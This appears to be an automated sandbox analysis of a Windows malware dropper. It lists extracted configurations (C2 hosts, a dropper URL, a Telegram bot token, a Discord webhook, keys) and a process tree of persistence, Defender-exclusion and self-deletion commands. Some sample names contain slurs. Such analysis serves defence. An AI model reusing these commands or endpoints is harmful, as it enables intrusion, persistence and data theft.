Analysis

  • max time kernel
    14s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 15:53

General

  • Target

    Shitstain.exe

  • Size

    74.9MB

  • MD5

    c7043b9b65e252b5305634da4f5515f1

  • SHA1

    129a58d2c6c4de7fcead562f9729a28e517fb6d4

  • SHA256

    07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a

  • SHA512

    cdc28eb03dcf533d19e74d7bd86962905486902c5556c448bbf0daa69be705dc1f18c7ea2c41ba8568a1910efb711edaa259a02d35108474e412b8044b719575

  • SSDEEP

    1572864:Z6x3bF0F9U7b7ewHkli+ouzl1IBMrGZHdk/6eSDFb:UBF0Fsb7ewHkliN4km+91xb

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

sharpstealer

C2

https://api.telegram.org/bot7057429288:AAHYl5_27YU1Yjmuj33WKOqLVSgYtq3n-8k/getUpdates

Extracted

Family

silverrat

Version

1.0.0.0

C2

clear-spice.gl.at.ply.gg:62042

Mutex

SilverMutex_ZtRAjMMKxS

Attributes
  • certificate

    MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==

  • decrypted_key

    -|S.S.S|-

  • discord

    https://discord.com/api/webhooks/1335733715820609557/QV6ZUiJPFo3MXmoiKBB-WTBlkHeBiFxmRY95RN_M1sHhPMswAoo2T6AL_kHvoSoCRKE0

  • key

    yy6zDjAUmbB09pKvo5Hhug==

  • key_x509

    dFRzdEVvbU9ZVUR2UmVzZFlPR3V3dlRGWURZdk9S

  • payload_url

    https://g.top4top.io/p_2522c7w8u1.png

  • reconnect_delay

    2

  • server_signature

    PtC8aQAwsdmyktc6Q/l3u9a8oFTj+Ey3VIlIKXe9bX2WiEn7hNPQ0tkMLi1qQ4IBmCWOFTRIVHi2GG5zTxUlAwkitK3X3bWdHiwrf6PqZ7NdmPsSKZym4q+nKXH4df40wtjNvJ2x2m8OSi5jsVvT64/UsmRfIZbFTRp63PCTQ6lN+EL6OoW+dMidok+JH6T8pG21/HyoeykN9muipEqdoixkTFitX6aUocvGy6VZCs7eSxoXtzmYQ3tBukBHuIZAivbVLiF2aDkkpSX6763SGMYUbfASkQ/ihv1elb+XOoqprP3V4GqcllwfGzlk+8/rQD8C3cwLiQEtXgKHbyYWrNcSvis5fYgRcEDvlk2ZkbE8VQE6aNc+VN0TZNW3ldvE+h62kKCYoOb7oJDwiw86IudT01xe9YetmDuCvOIBZqGoXj0h68jOIklH4g22Fx8pOaIisv01vdSoawFzoOQNfgfZeRgjvV6QJHQiYuodn+FWlPwYxQ7FzUJy3is8d0VoJr6rG2BeEn99pW/LO+SsCfPIGZvs7oA/oEsn2BBkGVhlko0IZCxd30q3HIEIwdagGJgHVtnC5C2yMsmjV3geQMUCdRsAJEuCEVqAkTr7QQNJoSCok8jOYoOeJxzwbNzAMySliCDNoGYhhU/jnfhJKsqo355RYtvKROehEYZ0Srg=

Extracted

Family

quasar

Version

1.3.0.0

Botnet

nigga

C2

niggahunter-28633.portmap.io:28633

Mutex

QSR_MUTEX_m0fef2zik6JZzavCsv

Attributes
  • encryption_key

    E3KUWr7JQZqCWN4hstks

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Runtime Broker

  • subdirectory

    SubDir

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

dropout-37757.portmap.host:55554

dropout-37757.portmap.host:37757

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://t5impactsupport.world/api

https://nestlecompany.world/api

https://mercharena.biz/api

https://stormlegue.com/api

https://blast-hubs.com/api

https://blastikcn.com/api

https://lestagames.world/api

Extracted

Family

danabot

C2

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Extracted

Family

amadey

Version

2.06

Botnet

216cb1

Attributes
  • install_dir

    a5410c88f1

  • install_file

    bween.exe

  • strings_key

    98f994e2e32b679144ff91a0b2c90190

  • url_paths

    /g5vpppHc/index.php

rc4.plain

Extracted

Family

asyncrat

Version

0.5.6B

Botnet

null

C2

rootedkrypto-29674.portmap.host:29674

Mutex

jsmjjhooulqefd

Attributes
  • delay

    5

  • install

    true

  • install_file

    Minecraft.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

crimsonrat

C2

185.136.161.124

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

5.tcp.ngrok.io:20448

Mutex

t8HkrZb9wdWvxGpD

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    Discord.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • CrimsonRAT main payload 1 IoCs
  • CrimsonRat

    Crimson RAT is a malware linked to a Pakistani-linked threat actor.

  • Crimsonrat family
  • Danabot

    Danabot is a modular banking Trojan that has been linked with other malware.

  • Danabot family
  • Detect Xworm Payload 1 IoCs
  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies firewall policy service 3 TTPs 3 IoCs
  • Modiloader family
  • Quasar RAT 7 IoCs

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 7 IoCs
  • Sharp Stealer

    Sharp Stealer is an infostealer first observed in 2024, based on Echelon and Umbral stealers.

  • Sharpstealer family
  • SilverRat

    SilverRat is trojan written in C#.

  • Silverrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • ModiLoader First Stage 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 56 IoCs
  • Loads dropped DLL 64 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops autorun.inf file 1 TTPs 18 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 2 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 3 IoCs
  • Modifies data under HKEY_USERS 11 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:492
      • C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
        C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1792
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
        PID:1120
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
          PID:1180
        • C:\Windows\Explorer.EXE
          C:\Windows\Explorer.EXE
          1⤵
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1208
          • C:\Users\Admin\AppData\Local\Temp\Shitstain.exe
            "C:\Users\Admin\AppData\Local\Temp\Shitstain.exe"
            2⤵
            • Quasar RAT
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2964
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2796
            • C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
              "C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              PID:2640
              • C:\Users\Admin\AppData\Roaming\Installer.exe
                "C:\Users\Admin\AppData\Roaming\Installer.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1704
            • C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
              "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2664
              • C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
                "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
                4⤵
                  PID:2992
                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                    C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                    5⤵
                      PID:4796
                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                      5⤵
                        PID:4808
                  • C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
                    "C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
                    3⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops autorun.inf file
                    • System Location Discovery: System Language Discovery
                    PID:2092
                  • C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
                    "C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:896
                    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                      4⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2060
                    • C:\Users\Admin\AppData\Local\Temp\proxyt.exe
                      "C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
                      4⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      PID:2404
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
                        5⤵
                          PID:6072
                    • C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
                      "C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2832
                    • C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
                      "C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2824
                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                        4⤵
                          PID:6020
                      • C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
                        "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1800
                      • C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
                        "C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1772
                        • C:\Windows\SysWOW64\regsvr32.exe
                          C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@1772
                          4⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:2248
                          • C:\Windows\SysWOW64\rundll32.exe
                            C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
                            5⤵
                            • Blocklisted process makes network request
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2468
                      • C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
                        "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2512
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -u -p 2512 -s 1060
                          4⤵
                            PID:2820
                        • C:\Users\Admin\AppData\Local\Temp\2020.exe
                          "C:\Users\Admin\AppData\Local\Temp\2020.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:888
                          • C:\Users\Admin\AppData\Local\Temp\2020.exe
                            "C:\Users\Admin\AppData\Local\Temp\2020.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3008
                        • C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
                          "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:2136
                          • C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
                            "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
                            4⤵
                              PID:4492
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\NFDOM.bat" "
                                5⤵
                                  PID:4104
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "skypee" /t REG_SZ /d "C:\Windows\Skypee\skypee.exe" /f
                                    6⤵
                                      PID:5396
                                  • C:\Windows\Skypee\skypee.exe
                                    "C:\Windows\Skypee\skypee.exe"
                                    5⤵
                                      PID:4520
                                      • C:\Windows\Skypee\skypee.exe
                                        "C:\Windows\Skypee\skypee.exe"
                                        6⤵
                                          PID:5656
                                        • C:\Windows\Skypee\skypee.exe
                                          "C:\Windows\Skypee\skypee.exe"
                                          6⤵
                                            PID:4732
                                            • C:\Windows\syswow64\svchost.exe
                                              C:\Windows\syswow64\svchost.exe
                                              7⤵
                                                PID:4636
                                      • C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
                                        "C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Accesses Microsoft Outlook profiles
                                        • outlook_office_path
                                        • outlook_win_path
                                        PID:2168
                                      • C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
                                        "C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
                                        3⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1652
                                      • C:\Users\Admin\AppData\Local\Temp\goofy.exe
                                        "C:\Users\Admin\AppData\Local\Temp\goofy.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:1280
                                        • C:\Windows\System32\attrib.exe
                                          "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
                                          4⤵
                                          • Sets file to hidden
                                          • Views/modifies file attributes
                                          PID:3356
                                        • C:\Windows\System32\attrib.exe
                                          "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
                                          4⤵
                                          • Sets file to hidden
                                          • Views/modifies file attributes
                                          PID:4024
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp19F6.tmp.bat""
                                          4⤵
                                            PID:1256
                                            • C:\Windows\system32\timeout.exe
                                              timeout 3
                                              5⤵
                                              • Delays execution with timeout.exe
                                              PID:4348
                                            • C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe
                                              "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
                                              5⤵
                                                PID:6112
                                                • C:\Windows\system32\schtasks.exe
                                                  "schtasks.exe" /query /TN $77bloody_was_here.exe
                                                  6⤵
                                                    PID:5428
                                                  • C:\Windows\system32\schtasks.exe
                                                    "schtasks.exe" /Create /SC ONCE /TN "$77bloody_was_here.exe" /TR "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe \"\$77bloody_was_here.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                                                    6⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:5864
                                                  • C:\Windows\system32\schtasks.exe
                                                    "schtasks.exe" /query /TN $77bloody_was_here.exe
                                                    6⤵
                                                      PID:5720
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:3752
                                                    • C:\Windows\System32\schtasks.exe
                                                      "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "bloody_was_here_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                                                      6⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:5508
                                              • C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
                                                "C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:1108
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of SetThreadContext
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2620
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2120
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 556
                                                    5⤵
                                                    • Loads dropped DLL
                                                    • Program crash
                                                    PID:2552
                                              • C:\Users\Admin\AppData\Local\Temp\nigga.exe
                                                "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2292
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
                                                  4⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2844
                                                • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                  "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                  4⤵
                                                    PID:2224
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                      5⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:3180
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZpR8ITCdjK4I.bat" "
                                                      5⤵
                                                        PID:3852
                                                        • C:\Windows\SysWOW64\chcp.com
                                                          chcp 65001
                                                          6⤵
                                                            PID:5228
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping -n 10 localhost
                                                            6⤵
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            • Runs ping.exe
                                                            PID:1328
                                                          • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                            "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                            6⤵
                                                              PID:5572
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                7⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:5788
